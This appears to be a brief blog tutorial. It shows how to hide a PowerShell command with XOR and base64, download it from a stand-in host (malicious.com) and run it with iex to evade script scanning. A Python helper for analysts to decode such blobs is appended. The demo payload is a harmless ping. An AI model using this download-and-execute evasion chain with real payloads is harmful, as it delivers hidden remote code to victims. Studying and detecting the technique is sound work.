I was recently reading an article from MS regarding AMSI and fileless malware and decided to give it a try in its simplest form. So let's have a look.

I want to make a "malicious" ping to google.com, which will be my target for now. I define the encoding to be UTF8 and convert the string to a byte array.


$enc = [system.Text.Encoding]::UTF8
$attackstring = "ping google.de"
$attackbytes = $enc.GetBytes($attackstring)

Now we can apply our obfuscation technique and bitwise XOR the byte array with 0x33.

# XOR every byte with 0x33 and keep the result as bytes, which is what ToBase64String expects
$xored = [byte[]] ($attackbytes | % { $_ -bxor 0x33 })

And finally, let’s convert the whole thing to base64.

$base64 = [System.Convert]::ToBase64String($xored)

Our base64 string is now this:

Q1pdVBNUXFxUX1YdV1Y=

You put this somewhere available for download, get it to the target machine, reverse the obfuscation and invoke the command.

So first we gotta get it.

$attack = Invoke-WebRequest malicious.com/dsklji342cfd

This downloads the base64 string we created previously. We now convert the base64 to a byte array, bitwise XOR it with the same value we used before, 0x33, and join the result into a string.

$bytes = [convert]::FromBase64String($attack)
$string = -join ($bytes | % { [char] ($_ -bxor 0x33)})

The last remaining step is to invoke the command.

iex $string

Well, and it works.

Pinging google.de [209.85.201.94] with 32 bytes of data:
Reply from 209.85.201.94: bytes=32 time=125ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
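As an added example (not part of the original post), here is a small Python triage helper an analyst can run over a recovered blob like the one above: it base64-decodes the blob and brute-forces every single-byte XOR key, ranking the candidates by printability and command-like keywords, so the key does not need to be known up front. The sample blob is the one produced above; the keyword list is a constructed assumption for scoring.

```python
import base64
import string

# Constructed sample: the blob produced in the post above (XOR 0x33, then base64).
SAMPLE_BLOB = "Q1pdVBNUXFxUX1YdV1Y="

# Assumed keyword list: tokens that make a decoded candidate look like a command.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "invoke-webrequest", "downloadstring",
                     "powershell", "ping", "cmd", "http")

# Printable ASCII plus the usual whitespace, minus vertical tab and form feed.
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte of data."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> float:
    """Higher is more text-like: printable ratio, plus one point per keyword hit
    once every byte is printable."""
    try:
        text = candidate.decode("ascii")
    except UnicodeDecodeError:
        return 0.0
    printable_ratio = sum(c in PRINTABLE for c in text) / max(len(text), 1)
    if printable_ratio < 1.0:
        return printable_ratio
    lowered = text.lower()
    hits = sum(tok in lowered for tok in SUSPICIOUS_TOKENS)
    return printable_ratio + hits


def recover_xor_base64(blob: str, top_n: int = 3):
    """Base64-decode the blob, try all 256 single-byte XOR keys and return the
    top_n candidates as (key, plaintext, score), best first."""
    raw = base64.b64decode(blob)
    ranked = []
    for key in range(256):
        plain = xor_bytes(raw, key)
        ranked.append((key, plain.decode("ascii", errors="replace"), score(plain)))
    ranked.sort(key=lambda t: t[2], reverse=True)
    return ranked[:top_n]


if __name__ == "__main__":
    for key, plain, s in recover_xor_base64(SAMPLE_BLOB):
        print(f"key=0x{key:02x} score={s:.2f} text={plain!r}")
```

For the sample blob the top candidate is key 0x33 with the plaintext "ping google.de"; the same routine works on any single-byte-XOR-then-base64 blob pulled from script block logs or a download.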